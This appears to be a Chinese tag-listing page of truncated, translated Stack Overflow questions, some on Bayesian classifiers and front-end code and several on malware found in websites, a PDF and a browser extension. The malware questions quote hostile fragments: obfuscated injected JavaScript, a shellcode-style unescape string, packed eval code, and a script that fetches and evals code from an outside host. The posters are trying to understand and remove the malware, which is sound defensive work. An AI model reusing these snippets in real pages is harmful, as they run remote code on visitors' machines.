草庐IT

恶意样本分类

全部标签

ruby-on-rails - 带有分类器 gem 的无效编码符号

当我将项目添加到我的Postgres数据库时,一切似乎都运行良好。在不做任何更改的情况下,只要在我的应用程序中的任何位置启动Madeleine,我的Rails应用程序就会开始失败:EncodingErrorinEventsController#updateinvalidencodingsymbolapp/controllers/events_controller.rb:137:in`update'137是问题行:135defupdate136@event=Event.find(params[:id])137m=SnapshotMadeleine.new("bayes_data")...

ruby - 贝叶斯分类器分数代表什么?

我正在使用rubyclassifiergem其分类方法返回根据训练模型分类的给定字符串的分数。分数是百分比吗?如果有,最大差值是100分吗? 最佳答案 这是概率的对数。对于大型训练集,实际概率是非常小的数字,因此对数更容易比较。从理论上讲,分数的范围从接近零的无穷小到负无穷大。10**score*100.0会给出实际概率,确实最大相差100。 关于ruby-贝叶斯分类器分数代表什么?,我们在StackOverflow上找到一个类似的问题: https://st

ruby - 在 Ruby 中实现贝叶斯分类器?

我想实现一个简单的贝叶斯分类系统来对短信进行基本的情感分析。欢迎提供在Ruby中实现的实用建议。也欢迎提出除贝叶斯之外的其他方法的建议。 最佳答案 IlyaGrigorik在BayesianClassifiers上的这篇博文中对这个问题给出了很好的答案。此外,您不妨看看ai4rrubygem用于贝叶斯分类器的一些替代方法。ID3是一个不错的选择,因为它提供了即使对机器学习技术没有任何真正了解的人也能“理解”的决策树。 关于ruby-在Ruby中实现贝叶斯分类器?,我们在StackOver

javascript - 多种分类的 Backbone.js 集合

我有一个包含名称和日期的待办事项列表。我希望能够使用标题或日期对列表进行排序。我该怎么做?比较器只允许一种类型的排序。谢谢。 最佳答案 可以在比较器中实现更多逻辑,以便您可以抽象出一些排序逻辑:varCollection=Backbone.Collection.extend({model:myModel,order:'name'comparator:function(model){if(this.order==='name'){returnmodel.get('name');}else{returnmodel.get('date')

javascript - 我网站中的恶意 javascript 代码

我在我的网站源代码中找到了这段代码:var_0xd28d=["\x5F\x30\x78\x33\x32\x6C\x73\x6A\x39","\x5F\x78\x6C\x74","\x5F\x78\x38\x66\x6B\x63\x33","\x66\x6C\x6F\x6F\x72","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68"];var_0x9ae4=[_0xd28d[0],12,_0xd28d[1],_0xd28d[2],2,31,Math,_0xd28d[3]];var_0xcd6e=[_0x9ae4[5],_0x9ae

javascript - 使用分类 ("active"鼠标悬停时 D3 颜色变化,真)

我是js和D3的新手。我已经生成了各种热图,并想使用D3的on.mouseover更改图block的颜色。我可以显式更改颜色,但想使用CSS事件规则。可能很容易修复。任何帮助将不胜感激。完整代码如下。谢谢。MJ-HeatmapCountryByDistrict_Port_NmeHeatmapbody{font:10pxsans-serif;}.label{font-weight:bold;}.tile{shape-rendering:crispEdges;}.axispath,.axisline{fill:none;stroke:#000;shape-rendering:crispEd

javascript - 为什么这个混淆代码在 JavaScript 中是恶意的?

我的一个friend的网站被列为恶意网站,我们发现一些混淆代码在他不知情的情况下被注入(inject)到他的index.php中。我对代码进行了两级反混淆,发现了这一点:(codecanbeviewedintheedithistory)谁能告诉我它想做什么以及为什么它是恶意的......? 最佳答案 总而言之,代码“解码”了放置的HTML在恶意URL中加载。以下行具有“编码”的HTML:n=["9","9","45","42",...每个数字代表一个以base-25为基数的字符。代码将遍历此数组并使用javascript的Strin

javascript - 从恶意 PDF 中提取 JavaScript

我有一个PDF文件,我知道它包含一个JavaScript脚本文件,该文件会做一些恶意的事情,但目前还不确定是什么。我已经成功解压缩了PDF文件并获得了纯文本JavaScript源代码,但它是代码本身,如果有点隐藏在我以前从未见过的这种语法中的话。代码示例:这是大部分代码的样子varbDWXfJFLrOqFuydrq=unescape;varQgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery=bDWXfJFLrOqFuydrq('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f9

javascript - 这是一段恶意代码吗?

所以我安装了这个外观粗略的chrome扩展程序,它需要“访问所有浏览数据”,所以我看了一下它的内部结构。它包含两个相同的文件,一个是名称正确的content.js,另一个是名称可疑的background.js,以及看起来像是未修改版本的jquery。其他两个包含相同的代码,我担心它看起来像一个键盘记录器。这是我在打包时必须使用jsfiddle整理的代码:eval(function(p,a,c,k,e,d){e=function(c){returnc};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){r

javascript - 在网站上查找恶意软件

我在这个问题上有点迷茫,所以请原谅。我知道SO上还有其他关于此的主题,但我找不到答案。在网站上,当它被加载时,用户点击它的位置并不重要,它是在浏览器中打开带有广告的附加选项卡。到目前为止,通过查看浏览器控制台我能够找到的是加载了一些js文件http://cdn.mecash.ru/js/replace.js这个文件包含!function(w){if(w.self==w.top){varr=newXMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!